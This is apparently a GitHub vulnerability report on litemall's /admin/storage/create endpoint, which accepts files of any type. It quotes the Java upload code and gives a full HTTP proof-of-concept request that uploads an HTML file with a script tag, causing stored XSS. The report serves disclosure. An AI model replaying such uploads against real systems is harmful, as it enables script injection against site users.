Unrestricted Upload of File with Dangerous Type  (CWE-434)

# Summary

The endpoint /admin/storage/create allow attacker uploads arbitrary type of file without sanitizer, which leads to Stored XSS, even RCE.

# Details

- litemall-admin-api/src/main/java/org/linlinjava/litemall/admin/web/AdminStorageController.java
```
@RequiresPermissions("admin:storage:create")
@RequiresPermissionsDesc(menu = {"系统管理", "对象存储"}, button = "上传")
@PostMapping("/create")
public Object create(@RequestParam("file") MultipartFile file) throws IOException {
    String originalFilename = file.getOriginalFilename();
    LitemallStorage litemallStorage = storageService.store(file.getInputStream(), file.getSize(),
            file.getContentType(), originalFilename);
    return ResponseUtil.ok(litemallStorage);
}
```

- litemall-core/src/main/java/org/linlinjava/litemall/core/storage/StorageService.java
```

public LitemallStorage store(InputStream inputStream, long contentLength, String contentType, String fileName) {
    String key = generateKey(fileName);
    storage.store(inputStream, contentLength, contentType, key);
    String url = generateUrl(key);
    LitemallStorage storageInfo = new LitemallStorage();
    storageInfo.setName(fileName);
    storageInfo.setSize((int) contentLength);
    storageInfo.setType(contentType);
    storageInfo.setKey(key);
    storageInfo.setUrl(url);
    litemallStorageService.add(storageInfo);

    return storageInfo;
}
```

# POC

```
POST /admin/storage/create HTTP/1.1
Host: localhost:8080
Content-Length: 245
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
X-Litemall-Admin-Token: 2dba70ac-4738-454f-bce6-684f0f52287d
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarys4nIUpvBSILPLERb
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: http://localhost:9527
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:9527/
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh;q=0.9,zh-CN;q=0.8
Connection: close

------WebKitFormBoundarys4nIUpvBSILPLERb
Content-Disposition: form-data; name="file"; filename="xss_comment_exif_metadata_single_quote.html"
Content-Type: text/html

<script>alert('XSS')</script>
------WebKitFormBoundarys4nIUpvBSILPLERb--


```

<img width="1280" height="590" alt="Image" src="https://github.com/user-attachments/assets/7c1b358a-162b-4a1c-87b8-8099fb757291" />

<img width="1280" height="435" alt="Image" src="https://github.com/user-attachments/assets/94eb8664-69fc-4e05-a1a6-ec25956e38d1" />

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Unrestricted Upload of File with Dangerous Type (CWE-434) #565

Summary

Details

POC

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Unrestricted Upload of File with Dangerous Type (CWE-434) #565

Description

Summary

Details

POC

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions